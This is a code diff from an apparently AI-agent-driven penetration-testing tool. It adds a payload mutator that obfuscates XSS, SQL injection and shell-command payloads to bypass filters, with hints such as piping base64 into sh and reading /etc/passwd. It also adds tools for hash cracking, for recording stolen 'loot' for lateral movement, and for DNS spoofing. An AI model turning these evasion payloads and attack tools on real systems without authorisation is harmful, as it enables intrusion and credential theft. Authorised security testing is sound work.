-        extractForms: p.extract_forms,
-        extractLinks: p.extract_links,
-        screenshot: p.screenshot,
-        extraHeaders: p.extra_headers
-      });
-      return {
-        success: result2.success,
-        output: result2.output,
-        error: result2.error
-      };
-    }
-  },
-  {
-    name: TOOL_NAMES.FILL_FORM,
-    description: `Fill and submit a web form. Use this for:
-- Testing form-based authentication
-- Submitting search forms
-- Testing for form injection vulnerabilities
-- Automated form interaction`,
+    name: TOOL_NAMES.FILL_FORM,
+    description: `Fill and submit a web form. Use this for:
+- Testing form-based authentication
+- Submitting search forms
+- Testing for form injection vulnerabilities
+- Automated form interaction`,
     parameters: {
       url: { type: "string", description: "URL containing the form" },
       fields: {
@@ -4355,167 +4268,384 @@ Returns a step-by-step guide for:
 - Check if a service version has known vulnerabilities
 - Get exploit information
 
-Includes critical CVEs like Log4Shell, Spring4Shell, EternalBlue, XZ Backdoor, etc.
-If CVE not found locally, use web_search to find it online.`,
+Includes critical CVEs like Log4Shell, Spring4Shell, EternalBlue, XZ Backdoor, etc.
+If CVE not found locally, use web_search to find it online.`,
+    parameters: {
+      cve_id: {
+        type: "string",
+        description: 'CVE identifier (e.g., "CVE-2021-44228") or "list" to see all known CVEs'
+      }
+    },
+    required: ["cve_id"],
+    execute: async (p) => {
+      const cveId = p.cve_id;
+      if (cveId.toLowerCase() === "list") {
+        const list = Object.entries(CVE_DATABASE).map(([id, info]) => `- ${id}: ${info.name} (${info.severity}) - ${info.affected}`).join("\n");
+        return {
+          success: true,
+          output: `# Known CVEs in Database
+
+${list}
+
+Use the specific CVE ID to get more details.
+For CVEs not in this list, use web_search to find them.`
+        };
+      }
+      const cve = CVE_DATABASE[cveId.toUpperCase()];
+      if (cve) {
+        return {
+          success: true,
+          output: `# ${cveId}
+
+**Name:** ${cve.name}
+**Severity:** ${cve.severity}
+**Affected:** ${cve.affected}
+**Description:** ${cve.description}`
+        };
+      }
+      return {
+        success: true,
+        output: `CVE ${cveId} not in local database. Use web_search({ query: "${cveId} exploit POC" }) to find more information online.`
+      };
+    }
+  }
+];
+
+// src/shared/utils/payload-mutator.ts
+function urlEncode(s) {
+  return [...s].map((c) => {
+    const code = c.charCodeAt(0);
+    if (code >= 65 && code <= 90 || code >= 97 && code <= 122 || code >= 48 && code <= 57) {
+      return c;
+    }
+    return `%${code.toString(16).padStart(2, "0").toUpperCase()}`;
+  }).join("");
+}
+function urlEncodeAll(s) {
+  return [...s].map((c) => `%${c.charCodeAt(0).toString(16).padStart(2, "0").toUpperCase()}`).join("");
+}
+function doubleUrlEncode(s) {
+  return urlEncodeAll(urlEncodeAll(s));
+}
+function tripleUrlEncode(s) {
+  return urlEncodeAll(urlEncodeAll(urlEncodeAll(s)));
+}
+function unicodeEncode(s) {
+  return [...s].map((c) => `%u${c.charCodeAt(0).toString(16).padStart(4, "0")}`).join("");
+}
+function htmlEntityDec(s) {
+  return [...s].map((c) => `&#${c.charCodeAt(0)};`).join("");
+}
+function htmlEntityHex(s) {
+  return [...s].map((c) => `&#x${c.charCodeAt(0).toString(16)};`).join("");
+}
+function hexEncode(s) {
+  return "0x" + [...s].map((c) => c.charCodeAt(0).toString(16).padStart(2, "0")).join("");
+}
+function octalEncode(s) {
+  return [...s].map((c) => `\\${c.charCodeAt(0).toString(8)}`).join("");
+}
+function base64Encode(s) {
+  return Buffer.from(s).toString("base64");
+}
+function caseSwap(s) {
+  return [...s].map((c) => {
+    if (Math.random() > 0.5) return c.toUpperCase();
+    return c.toLowerCase();
+  }).join("");
+}
+function commentInsert(s) {
+  const keywords = ["SELECT", "UNION", "FROM", "WHERE", "INSERT", "UPDATE", "DELETE", "DROP", "AND", "OR", "ORDER", "GROUP", "HAVING"];
+  let result2 = s;
+  for (const kw of keywords) {
+    const regex = new RegExp(kw, "gi");
+    result2 = result2.replace(regex, (match) => {
+      if (match.length <= 2) return match;
+      const mid = Math.floor(match.length / 2);
+      return match.slice(0, mid) + "/**/" + match.slice(mid);
+    });
+  }
+  return result2;
+}
+function whitespaceAlt(s) {
+  const alts = ["%09", "%0a", "%0c", "%0d", "/**/"];
+  const alt = alts[Math.floor(Math.random() * alts.length)];
+  return s.replace(/ /g, alt);
+}
+function charFunction(s, dbType = "mysql") {
+  const chars = [...s].map((c) => c.charCodeAt(0));
+  if (dbType === "mysql") {
+    return `CHAR(${chars.join(",")})`;
+  }
+  if (dbType === "mssql") {
+    return chars.map((c) => `CHAR(${c})`).join("+");
+  }
+  return chars.map((c) => `CHR(${c})`).join("||");
+}
+function concatSplit(s) {
+  if (s.length <= 2) return s;
+  const mid = Math.floor(s.length / 2);
+  return `CONCAT('${s.slice(0, mid)}','${s.slice(mid)}')`;
+}
+function nullByteAppend(s) {
+  return s + "%00";
+}
+function reversePayload(s) {
+  return [...s].reverse().join("");
+}
+function utf8Overlong(s) {
+  return s.replace(/\//g, "%c0%af").replace(/\./g, "%c0%ae");
+}
+function mixedEncoding(s) {
+  return [...s].map((c, i) => {
+    if (i % 2 === 0 && c !== " ") return c;
+    return `%${c.charCodeAt(0).toString(16).padStart(2, "0")}`;
+  }).join("");
+}
+function keywordBypass(s) {
+  return [...s].map((c, i) => {
+    if (i > 0 && i < s.length - 1 && i % 3 === 0 && c.match(/[a-z]/i)) {
+      return `'${c}'`;
+    }
+    return c;
+  }).join("");
+}
+function spaceBypass(s) {
+  return s.replace(/ /g, "${IFS}");
+}
+function generateXssAlternatives(payload) {
+  const variants = [];
+  const tagPayloads = [
+    { p: "<svg onload=alert(1)>", d: "SVG onload" },
+    { p: "<img src=x onerror=alert(1)>", d: "IMG onerror" },
+    { p: "<body onload=alert(1)>", d: "BODY onload" },
+    { p: "<input onfocus=alert(1) autofocus>", d: "INPUT onfocus autofocus" },
+    { p: "<details open ontoggle=alert(1)>", d: "DETAILS ontoggle" },
+    { p: "<marquee onstart=alert(1)>", d: "MARQUEE onstart" },
+    { p: "<video src=x onerror=alert(1)>", d: "VIDEO onerror" },
+    { p: "<audio src=x onerror=alert(1)>", d: "AUDIO onerror" },
+    { p: '<iframe src="javascript:alert(1)">', d: "IFRAME javascript protocol" },
+    { p: '<object data="javascript:alert(1)">', d: "OBJECT javascript protocol" },
+    { p: "<svg><animate onbegin=alert(1) attributeName=x dur=1s>", d: "SVG animate onbegin" }
+  ];
+  const alertBypass = [
+    { p: "confirm(1)", d: "confirm() instead of alert()" },
+    { p: "prompt(1)", d: "prompt() instead of alert()" },
+    { p: 'eval(atob("YWxlcnQoMSk="))', d: "eval+base64 of alert(1)" },
+    { p: "window['al'+'ert'](1)", d: "string concat alert" },
+    { p: "self[`al`+`ert`](1)", d: "template literal alert" },
+    { p: '[].constructor.constructor("alert(1)")()', d: "constructor chain" }
+  ];
+  for (const tag of tagPayloads) {
+    variants.push({ payload: tag.p, transform: "tag_alternative", description: tag.d });
+  }
+  for (const alt of alertBypass) {
+    variants.push({ payload: `<img src=x onerror=${alt.p}>`, transform: "js_alternative", description: alt.d });
+  }
+  return variants;
+}
+function generateSqlAlternatives(payload) {
+  const variants = [];
+  variants.push({ payload: payload.replace(/--.*$/, "--"), transform: "comment_variation", description: "Double dash comment" });
+  variants.push({ payload: payload.replace(/--.*$/, "#"), transform: "comment_variation", description: "Hash comment (MySQL)" });
+  variants.push({ payload: payload.replace(/--.*$/, "/*"), transform: "comment_variation", description: "Block comment" });
+  variants.push({ payload: payload.replace(/--.*$/, "-- -"), transform: "comment_variation", description: "Dash-space-dash" });
+  variants.push({ payload: payload.replace(/--.*$/, ";--"), transform: "comment_variation", description: "Semicolon then comment" });
+  const mysqlVersion = payload.replace(/(UNION|SELECT|INSERT|UPDATE|DELETE|FROM|WHERE)/gi, "/*!50000$1*/");
+  variants.push({ payload: mysqlVersion, transform: "mysql_version_comment", description: "MySQL version comment bypass" });
+  return variants;
+}
+function mutatePayload(request) {
+  const { payload, transforms, context = "generic", maxVariants = 20 } = request;
+  const variants = [];
+  const recommendations = [];
+  const activeTransforms = transforms || getDefaultTransforms(context);
+  for (const transform of activeTransforms) {
+    switch (transform) {
+      case "url":
+        variants.push({ payload: urlEncode(payload), transform: "url", description: "URL encoded (special chars only)" });
+        variants.push({ payload: urlEncodeAll(payload), transform: "url_full", description: "URL encoded (all chars)" });
+        break;
+      case "double_url":
+        variants.push({ payload: doubleUrlEncode(payload), transform: "double_url", description: "Double URL encoded" });
+        break;
+      case "triple_url":
+        variants.push({ payload: tripleUrlEncode(payload), transform: "triple_url", description: "Triple URL encoded" });
+        break;
+      case "unicode":
+        variants.push({ payload: unicodeEncode(payload), transform: "unicode", description: "Unicode escape sequences" });
+        break;
+      case "html_entity_dec":
+        variants.push({ payload: htmlEntityDec(payload), transform: "html_entity_dec", description: "HTML decimal entities" });
+        break;
+      case "html_entity_hex":
+        variants.push({ payload: htmlEntityHex(payload), transform: "html_entity_hex", description: "HTML hex entities" });
+        break;
+      case "hex":
+        variants.push({ payload: hexEncode(payload), transform: "hex", description: "Hex encoded" });
+        break;
+      case "octal":
+        variants.push({ payload: octalEncode(payload), transform: "octal", description: "Octal encoded" });
+        break;
+      case "base64":
+        variants.push({ payload: base64Encode(payload), transform: "base64", description: "Base64 encoded" });
+        break;
+      case "case_swap":
+        for (let i = 0; i < 3; i++) {
+          variants.push({ payload: caseSwap(payload), transform: "case_swap", description: `Case variation ${i + 1}` });
+        }
+        break;
+      case "comment_insert":
+        variants.push({ payload: commentInsert(payload), transform: "comment_insert", description: "SQL comments in keywords" });
+        break;
+      case "whitespace_alt":
+        variants.push({ payload: whitespaceAlt(payload), transform: "whitespace_alt", description: "Alternative whitespace chars" });
+        variants.push({ payload: payload.replace(/ /g, "/**/"), transform: "whitespace_comment", description: "Comment as whitespace" });
+        variants.push({ payload: payload.replace(/ /g, "+"), transform: "whitespace_plus", description: "Plus as whitespace" });
+        break;
+      case "char_function":
+        variants.push({ payload: charFunction(payload, "mysql"), transform: "char_mysql", description: "MySQL CHAR() encoding" });
+        variants.push({ payload: charFunction(payload, "mssql"), transform: "char_mssql", description: "MSSQL CHAR() encoding" });
+        variants.push({ payload: charFunction(payload, "pg"), transform: "char_pg", description: "PostgreSQL CHR() encoding" });
+        break;
+      case "concat_split":
+        variants.push({ payload: concatSplit(payload), transform: "concat_split", description: "String split via CONCAT" });
+        break;
+      case "null_byte":
+        variants.push({ payload: nullByteAppend(payload), transform: "null_byte", description: "Null byte appended" });
+        variants.push({ payload: payload + "%00.jpg", transform: "null_byte_ext", description: "Null byte + fake extension" });
+        break;
+      case "reverse":
+        variants.push({ payload: reversePayload(payload), transform: "reverse", description: "Reversed (use with rev | sh)" });
+        break;
+      case "utf8_overlong":
+        variants.push({ payload: utf8Overlong(payload), transform: "utf8_overlong", description: "UTF-8 overlong sequences" });
+        break;
+      case "mixed_encoding":
+        variants.push({ payload: mixedEncoding(payload), transform: "mixed_encoding", description: "Mixed encoding (partial)" });
+        break;
+      case "tag_alternative":
+      case "event_handler":
+      case "js_alternative":
+        variants.push(...generateXssAlternatives(payload));
+        break;
+      case "keyword_bypass":
+        variants.push({ payload: keywordBypass(payload), transform: "keyword_bypass", description: "Quote-inserted keyword bypass" });
+        variants.push({ payload: spaceBypass(payload), transform: "space_bypass", description: "$IFS space bypass" });
+        break;
+      case "space_bypass":
+        variants.push({ payload: payload.replace(/ /g, "${IFS}"), transform: "ifs", description: "$IFS space bypass" });
+        variants.push({ payload: payload.replace(/ /g, "%09"), transform: "tab", description: "Tab space bypass" });
+        variants.push({ payload: payload.replace(/ /g, "<"), transform: "redirect", description: "Redirect as separator" });
+        const parts = payload.split(" ");
+        if (parts.length >= 2) {
+          variants.push({ payload: `{${parts.join(",")}}`, transform: "brace", description: "Brace expansion" });
+        }
+        break;
+    }
+  }
+  if (context.startsWith("sql")) {
+    variants.push(...generateSqlAlternatives(payload));
+  }
+  recommendations.push(...getContextRecommendations(context, variants.length));
+  return {
+    variants: variants.slice(0, maxVariants),
+    recommendations
+  };
+}
+function getDefaultTransforms(context) {
+  switch (context) {
+    case "url_path":
+    case "url_param":
+      return ["url", "double_url", "unicode", "utf8_overlong", "mixed_encoding", "null_byte"];
+    case "html_body":
+      return ["html_entity_dec", "html_entity_hex", "unicode", "tag_alternative", "event_handler", "js_alternative"];
+    case "html_attr":
+      return ["html_entity_dec", "html_entity_hex", "event_handler"];
+    case "js_string":
+      return ["unicode", "hex", "base64", "js_alternative"];
+    case "sql_string":
+    case "sql_numeric":
+      return ["case_swap", "comment_insert", "whitespace_alt", "char_function", "concat_split", "url", "double_url"];
+    case "shell_cmd":
+      return ["keyword_bypass", "space_bypass", "base64", "reverse", "hex", "octal"];
+    case "xml_body":
+      return ["html_entity_dec", "html_entity_hex", "unicode"];
+    case "json_body":
+      return ["unicode"];
+    case "http_header":
+    case "cookie":
+      return ["url", "double_url", "base64"];
+    default:
+      return ["url", "double_url", "html_entity_dec", "unicode", "base64", "case_swap"];
+  }
+}
+function getContextRecommendations(context, variantCount) {
+  const recs = [];
+  recs.push(`Generated ${variantCount} variants for context: ${context}`);
+  switch (context) {
+    case "url_param":
+      recs.push("If all URL encoding fails: try HTTP Parameter Pollution (send same param twice)");
+      recs.push("Try switching GET \u2192 POST or changing Content-Type");
+      recs.push("Check if WebSocket endpoint exists (often unfiltered)");
+      break;
+    case "sql_string":
+    case "sql_numeric":
+      recs.push("If inline comments fail: try MySQL version comments /*!50000SELECT*/");
+      recs.push("Try time-based blind if error/union payloads are blocked");
+      recs.push("Use sqlmap with --tamper scripts for automated bypass");
+      break;
+    case "html_body":
+      recs.push("If common XSS tags blocked: try SVG, MathML, mutation XSS");
+      recs.push("Check CSP header \u2014 it determines what JS execution is possible");
+      recs.push("Try DOM-based XSS via document.location, innerHTML, postMessage");
+      break;
+    case "shell_cmd":
+      recs.push("Use ${IFS} for space, quotes for keyword bypass, base64 for full obfuscation");
+      recs.push("Try: echo PAYLOAD_BASE64 | base64 -d | sh");
+      recs.push("Variable concatenation: a=c;b=at;$a$b /etc/passwd");
+      break;
+  }
+  recs.push("If all variants fail: web_search for latest bypass techniques for this specific filter type");
+  return recs;
+}
+
+// src/engine/tools/pentest-attack-tools.ts
+var createAttackTools = (_state) => [
+  {
+    name: TOOL_NAMES.HASH_CRACK,
+    description: `Crack password hashes using hashcat or john.
+Runs as a background process by default. Use bg_process status to check progress.
+Common wordlists are automatically searched in /usr/share/wordlists (rockyou.txt, etc).`,
     parameters: {
-      cve_id: {
-        type: "string",
-        description: 'CVE identifier (e.g., "CVE-2021-44228") or "list" to see all known CVEs'
-      }
+      hashes: { type: "string", description: "Hash(es) to crack (raw or file path)" },
+      format: { type: "string", description: "Hash format (e.g., md5, sha1, nt, mscash2). Omit for auto-detect." },
+      wordlist: { type: "string", description: "Wordlist name or path (default: rockyou)" },
+      background: { type: "boolean", description: "Run in background. Default: true" }
     },
-    required: ["cve_id"],
+    required: ["hashes"],
     execute: async (p) => {
-      const cveId = p.cve_id;
-      if (cveId.toLowerCase() === "list") {
-        const list = Object.entries(CVE_DATABASE).map(([id, info]) => `- ${id}: ${info.name} (${info.severity}) - ${info.affected}`).join("\n");
-        return {
-          success: true,
-          output: `# Known CVEs in Database
-
-${list}
-
-Use the specific CVE ID to get more details.
-For CVEs not in this list, use web_search to find them.`
-        };
-      }
-      const cve = CVE_DATABASE[cveId.toUpperCase()];
-      if (cve) {
+      const hashes = p.hashes;
+      const format = p.format;
+      const wordlist = p.wordlist || "rockyou";
+      const background = p.background !== false;
+      let wordlistPath = wordlist;
+      if (wordlist === "rockyou") wordlistPath = WORDLISTS.ROCKYOU;
+      const cmd = `hashcat -m ${format || HASHCAT_MODES.MD5} "${hashes}" "${wordlistPath}" --force`;
+      if (background) {
+        const proc = startBackgroundProcess(cmd, {
+          description: `Cracking hashes: ${hashes.slice(0, 20)}...`,
+          purpose: `Attempting to crack ${format || "unknown"} hashes using ${wordlist}`
+        });
         return {
           success: true,
-          output: `# ${cveId}
-
-**Name:** ${cve.name}
-**Severity:** ${cve.severity}
-**Affected:** ${cve.affected}
-**Description:** ${cve.description}`
+          output: `Hash cracking started in background (ID: ${proc.id}).
+Command: ${cmd}
+Check status with: bg_process({ action: "status", process_id: "${proc.id}" })`
         };
+      } else {
+        return runCommand(cmd);
       }
-      return {
-        success: true,
-        output: `CVE ${cveId} not in local database. Use web_search({ query: "${cveId} exploit POC" }) to find more information online.`
-      };
-    }
-  },
-  {
-    name: TOOL_NAMES.ADD_TARGET,
-    description: `Register a new target for the engagement.
-Use this when you discover new hosts during recon, pivoting, or post-exploitation.
-The target will be tracked in SharedState and available for all agents.`,
-    parameters: {
-      ip: { type: "string", description: "Target IP address" },
-      hostname: { type: "string", description: "Target hostname (optional)" },
-      ports: {
-        type: "array",
-        items: {
-          type: "object",
-          properties: {
-            port: { type: "number", description: "Port number" },
-            service: { type: "string", description: "Service name (e.g., http, ssh)" },
-            version: { type: "string", description: "Service version" },
-            state: { type: "string", description: "Port state (default: open)" }
-          },
-          required: ["port", "service"]
-        },
-        description: "Discovered ports (optional, can add later via recon)"
-      },
-      tags: {
-        type: "array",
-        items: { type: "string" },
-        description: 'Tags for categorization (e.g., "internal", "dmz", "pivot")'
-      }
-    },
-    required: ["ip"],
-    execute: async (p) => {
-      const ip = p.ip;
-      const existing = state.getTarget(ip);
-      if (existing) {
-        const newPorts = p.ports || [];
-        for (const np of newPorts) {
-          const exists = existing.ports.some((ep) => ep.port === np.port);
-          if (!exists) {
-            existing.ports.push({
-              port: np.port,
-              service: np.service || "unknown",
-              version: np.version,
-              state: np.state || "open",
-              notes: []
-            });
-          }
-        }
-        if (p.hostname) existing.hostname = p.hostname;
-        if (p.tags) existing.tags = [.../* @__PURE__ */ new Set([...existing.tags, ...p.tags])];
-        return { success: true, output: `Target ${ip} updated. Total ports: ${existing.ports.length}` };
-      }
-      const ports = (p.ports || []).map((port) => ({
-        port: port.port,
-        service: port.service || "unknown",
-        version: port.version,
-        state: port.state || "open",
-        notes: []
-      }));
-      state.addTarget({
-        ip,
-        hostname: p.hostname,
-        ports,
-        tags: p.tags || [],
-        firstSeen: Date.now()
-      });
-      return { success: true, output: `Target ${ip} added.${p.hostname ? ` Hostname: ${p.hostname}` : ""} Ports: ${ports.length}` };
-    }
-  },
-  {
-    name: TOOL_NAMES.ADD_LOOT,
-    description: `Record captured loot (credentials, hashes, tokens, SSH keys, files, etc).
-Use this whenever you discover sensitive data during the engagement.
-Loot is tracked in SharedState and visible to all agents for credential reuse and lateral movement.
-Types: credential, hash, token, ssh_key, api_key, file, session, ticket, certificate`,
-    parameters: {
-      type: { type: "string", description: "Loot type: credential, hash, token, ssh_key, api_key, file, session, ticket, certificate" },
-      host: { type: "string", description: "Source host where loot was found" },
-      detail: { type: "string", description: 'Loot detail (e.g., "admin:Password123", "root:$6$...", "JWT admin token")' }
-    },
-    required: ["type", "host", "detail"],
-    execute: async (p) => {
-      const lootType = p.type;
-      const crackableTypes = ["hash"];
-      state.addLoot({
-        type: lootType,
-        host: p.host,
-        detail: p.detail,
-        obtainedAt: Date.now(),
-        isCrackable: crackableTypes.includes(lootType),
-        isCracked: false
-      });
-      return {
-        success: true,
-        output: `Loot recorded: [${lootType}] from ${p.host}
-Detail: ${p.detail}
-` + (crackableTypes.includes(lootType) ? `This is crackable. Consider: hash_crack({ hashes: "${p.detail.slice(0, 30)}..." })` : `Consider credential reuse / lateral movement with this loot.`)
-      };
-    }
-  },
-  {
-    name: TOOL_NAMES.ADD_FINDING,
-    description: "Add a security finding",
-    parameters: {
-      title: { type: "string", description: "Finding title" },
-      severity: { type: "string", description: "Severity" },
-      affected: { type: "array", items: { type: "string" }, description: "Affected host:port" }
-    },
-    required: ["title", "severity"],
-    execute: async (p) => {
-      state.addFinding({
-        id: generateId(ID_RADIX, ID_LENGTH),
-        title: p.title,
-        severity: p.severity,
-        affected: p.affected || [],
-        description: p.description || "",
-        evidence: [],
-        isVerified: false,
-        remediation: "",
-        foundAt: Date.now()
-      });
-      return { success: true, output: `Added: ${p.title}` };
     }
   },
   {
@@ -4568,12 +4698,6 @@ ${variantList}
       };
     }
   },
-  {
-    name: TOOL_NAMES.GET_STATE,
-    description: "Get current engagement state summary",
-    parameters: {},
-    execute: async () => ({ success: true, output: state.toPrompt() })
-  },
   {
     name: TOOL_NAMES.GET_WORDLISTS,
     description: `Discover available wordlists on the system by scanning actual filesystem paths.
@@ -4606,8 +4730,8 @@ Returns: All available wordlists with their paths, sizes, and categories.`,
       }
     },
     execute: async (p) => {
-      const { existsSync: existsSync6, statSync, readdirSync: readdirSync2 } = await import("fs");
-      const { join: join7 } = await import("path");
+      const { existsSync: existsSync7, statSync: statSync2, readdirSync: readdirSync3 } = await import("fs");
+      const { join: join10 } = await import("path");
       const category = p.category || "";
       const search = p.search || "";
       const minSize = p.min_size || 0;
@@ -4622,11 +4746,11 @@ Returns: All available wordlists with their paths, sizes, and categories.`,
       let totalCount = 0;
       const scanDir = (dirPath, maxDepth = 3, currentDepth = 0) => {
         if (currentDepth > maxDepth) return;
-        if (!existsSync6(dirPath)) return;
+        if (!existsSync7(dirPath)) return;
         try {
-          const entries = readdirSync2(dirPath, { withFileTypes: true });
+          const entries = readdirSync3(dirPath, { withFileTypes: true });
           for (const entry of entries) {
-            const fullPath = join7(dirPath, entry.name);
+            const fullPath = join10(dirPath, entry.name);
             if (entry.isDirectory()) {
               if (entry.name.startsWith(".")) continue;
               if (entry.name === "doc") continue;
@@ -4637,7 +4761,7 @@ Returns: All available wordlists with their paths, sizes, and categories.`,
                 continue;
               }
               try {
-                const stats = statSync(fullPath);
+                const stats = statSync2(fullPath);
                 const sizeBytes = stats.size;
                 if (sizeBytes < minSize) continue;
                 const relPath = fullPath;
@@ -4712,6 +4836,14 @@ Returns: All available wordlists with their paths, sizes, and categories.`,
   }
 ];
 
+// src/engine/tools/pentest.ts
+var createPentestTools = (state) => [
+  ...createStateTools(state),
+  ...createTargetTools(state),
+  ...createIntelTools(state),
+  ...createAttackTools(state)
+];
+
 // src/engine/tools/agents.ts
 var globalCredentialHandler = null;
 function setCredentialHandler(handler) {
@@ -4727,7 +4859,7 @@ async function requestCredential(request) {
   try {
     const value = await globalCredentialHandler(request);
     if (value === null) {
-      if (request.optional) {
+      if (request.isOptional) {
         return {
           success: true,
           output: `User skipped: ${request.prompt}${request.default ? ` (using default)` : ""}`,
@@ -4779,7 +4911,7 @@ Always provide context about why you need this input.`,
         type: "string",
         description: 'Additional context (e.g., "for SSH connection to 192.168.1.1")'
       },
-      optional: {
+      isOptional: {
         type: "boolean",
         description: "Whether this input is optional"
       },
@@ -4795,7 +4927,7 @@ Always provide context about why you need this input.`,
         type: p.input_type || INPUT_TYPES.TEXT,
         prompt: p.question,
         context: p.context,
-        optional: p.optional,
+        isOptional: p.isOptional,
         options: p.options
       };
       const result2 = await requestCredential(request);
@@ -5039,8 +5171,8 @@ Requires root/sudo privileges.`,
       const iface = p.interface || "";
       const duration = p.duration || NETWORK_CONFIG.DEFAULT_SPOOF_DURATION;
       const hostsFile = createTempFile(".hosts");
-      const { writeFileSync: writeFileSync5 } = await import("fs");
-      writeFileSync5(hostsFile, `${spoofIp}	${domain}
+      const { writeFileSync: writeFileSync6 } = await import("fs");
+      writeFileSync6(hostsFile, `${spoofIp}	${domain}
 ${spoofIp}	*.${domain}
 `);
       const ifaceFlag = iface ? `-i ${iface}` : "";
@@ -5742,81 +5874,81 @@ var ServiceParser = class {
 };
 
 // src/domains/registry.ts
-import { join as join4, dirname as dirname2 } from "path";
-import { fileURLToPath as fileURLToPath2 } from "url";
-var __dirname2 = dirname2(fileURLToPath2(import.meta.url));
+import { join as join6, dirname as dirname3 } from "path";
+import { fileURLToPath as fileURLToPath3 } from "url";
+var __dirname3 = dirname3(fileURLToPath3(import.meta.url));
 var DOMAINS = {
   [SERVICE_CATEGORIES.NETWORK]: {
     id: SERVICE_CATEGORIES.NETWORK,
     name: "Network Infrastructure",
     description: "Vulnerability scanning, port mapping, and network service exploitation.",
-    promptPath: join4(__dirname2, "network/prompt.md")
+    promptPath: join6(__dirname3, "network/prompt.md")
   },
   [SERVICE_CATEGORIES.WEB]: {
     id: SERVICE_CATEGORIES.WEB,
     name: "Web Application",
     description: "Web app security testing, injection attacks, and auth bypass.",
-    promptPath: join4(__dirname2, "web/prompt.md")
+    promptPath: join6(__dirname3, "web/prompt.md")
   },
   [SERVICE_CATEGORIES.DATABASE]: {
     id: SERVICE_CATEGORIES.DATABASE,
     name: "Database Security",
     description: "SQL injection, database enumeration, and data extraction.",
-    promptPath: join4(__dirname2, "database/prompt.md")
+    promptPath: join6(__dirname3, "database/prompt.md")
   },
   [SERVICE_CATEGORIES.AD]: {
     id: SERVICE_CATEGORIES.AD,
     name: "Active Directory",
     description: "Kerberos, LDAP, and Windows domain privilege escalation.",
-    promptPath: join4(__dirname2, "ad/prompt.md")
+    promptPath: join6(__dirname3, "ad/prompt.md")
   },
   [SERVICE_CATEGORIES.EMAIL]: {
     id: SERVICE_CATEGORIES.EMAIL,
     name: "Email Services",
     description: "SMTP, IMAP, POP3 security and user enumeration.",
-    promptPath: join4(__dirname2, "email/prompt.md")
+    promptPath: join6(__dirname3, "email/prompt.md")
   },
   [SERVICE_CATEGORIES.REMOTE_ACCESS]: {
     id: SERVICE_CATEGORIES.REMOTE_ACCESS,
     name: "Remote Access",
     description: "SSH, RDP, VNC and other remote control protocols.",
-    promptPath: join4(__dirname2, "remote-access/prompt.md")
+    promptPath: join6(__dirname3, "remote-access/prompt.md")
   },
   [SERVICE_CATEGORIES.FILE_SHARING]: {
     id: SERVICE_CATEGORIES.FILE_SHARING,
     name: "File Sharing",
     description: "SMB, NFS, FTP and shared resource security.",
-    promptPath: join4(__dirname2, "file-sharing/prompt.md")
+    promptPath: join6(__dirname3, "file-sharing/prompt.md")
   },
   [SERVICE_CATEGORIES.CLOUD]: {
     id: SERVICE_CATEGORIES.CLOUD,
     name: "Cloud Infrastructure",
     description: "AWS, Azure, and GCP security and misconfiguration.",
-    promptPath: join4(__dirname2, "cloud/prompt.md")
+    promptPath: join6(__dirname3, "cloud/prompt.md")
   },
   [SERVICE_CATEGORIES.CONTAINER]: {
     id: SERVICE_CATEGORIES.CONTAINER,
     name: "Container Systems",
     description: "Docker and Kubernetes security testing.",
-    promptPath: join4(__dirname2, "container/prompt.md")
+    promptPath: join6(__dirname3, "container/prompt.md")
   },
   [SERVICE_CATEGORIES.API]: {
     id: SERVICE_CATEGORIES.API,
     name: "API Security",
     description: "REST, GraphQL, and SOAP API security testing.",
-    promptPath: join4(__dirname2, "api/prompt.md")
+    promptPath: join6(__dirname3, "api/prompt.md")
   },
   [SERVICE_CATEGORIES.WIRELESS]: {
     id: SERVICE_CATEGORIES.WIRELESS,
     name: "Wireless Networks",
     description: "WiFi and Bluetooth security testing.",
-    promptPath: join4(__dirname2, "wireless/prompt.md")
+    promptPath: join6(__dirname3, "wireless/prompt.md")
   },
   [SERVICE_CATEGORIES.ICS]: {
     id: SERVICE_CATEGORIES.ICS,
     name: "Industrial Systems",
     description: "Critical infrastructure - Modbus, DNP3, ENIP.",
-    promptPath: join4(__dirname2, "ics/prompt.md")
+    promptPath: join6(__dirname3, "ics/prompt.md")
   }
 };
 
@@ -6596,10 +6728,77 @@ function logLLM(message, data) {
 }
 
 // src/engine/orchestrator/orchestrator.ts
-import { fileURLToPath as fileURLToPath3 } from "url";
-import { dirname as dirname3, join as join5 } from "path";
-var __filename2 = fileURLToPath3(import.meta.url);
-var __dirname3 = dirname3(__filename2);
+import { fileURLToPath as fileURLToPath4 } from "url";
+import { dirname as dirname4, join as join7 } from "path";
+var __filename3 = fileURLToPath4(import.meta.url);
+var __dirname4 = dirname4(__filename3);
+
+// src/engine/state-persistence.ts
+import { writeFileSync as writeFileSync5, readFileSync as readFileSync3, existsSync as existsSync5, readdirSync, statSync } from "fs";
+import { join as join8, basename } from "path";
+function saveState(state) {
+  const sessionsDir = WORKSPACE.SESSIONS;
+  ensureDirExists(sessionsDir);
+  const snapshot = {
+    version: 1,
+    savedAt: Date.now(),
+    engagement: state.getEngagement(),
+    targets: Array.from(state.getTargets().entries()).map(([key, value]) => ({ key, value })),
+    findings: state.getFindings(),
+    loot: state.getLoot(),
+    todo: state.getTodo(),
+    actionLog: state.getRecentActions(9999),
+    currentPhase: state.getPhase(),
+    missionSummary: state.getMissionSummary(),
+    missionChecklist: state.getMissionChecklist()
+  };
+  const sessionId = (/* @__PURE__ */ new Date()).toISOString().replace(/[:.]/g, "-");
+  const sessionFile = join8(sessionsDir, `${sessionId}.json`);
+  writeFileSync5(sessionFile, JSON.stringify(snapshot, null, 2), "utf-8");
+  const latestFile = join8(sessionsDir, "latest.json");
+  writeFileSync5(latestFile, JSON.stringify(snapshot, null, 2), "utf-8");
+  return sessionFile;
+}
+function loadState(state) {
+  const latestFile = join8(WORKSPACE.SESSIONS, "latest.json");
+  if (!existsSync5(latestFile)) {
+    return false;
+  }
+  try {
+    const raw = readFileSync3(latestFile, "utf-8");
+    const snapshot = JSON.parse(raw);
+    if (snapshot.version !== 1) {
+      console.warn(`[StatePersistence] Unknown snapshot version: ${snapshot.version}`);
+      return false;
+    }
+    if (snapshot.engagement) {
+      state.setEngagement(snapshot.engagement);
+    }
+    for (const { value } of snapshot.targets) {
+      state.addTarget(value);
+    }
+    for (const finding of snapshot.findings) {
+      state.addFinding(finding);
+    }
+    for (const loot of snapshot.loot) {
+      state.addLoot(loot);
+    }
+    for (const item of snapshot.todo) {
+      state.addTodo(item.content, item.priority);
+    }
+    state.setPhase(snapshot.currentPhase);
+    if (snapshot.missionSummary) {
+      state.setMissionSummary(snapshot.missionSummary);
+    }
+    if (snapshot.missionChecklist?.length > 0) {
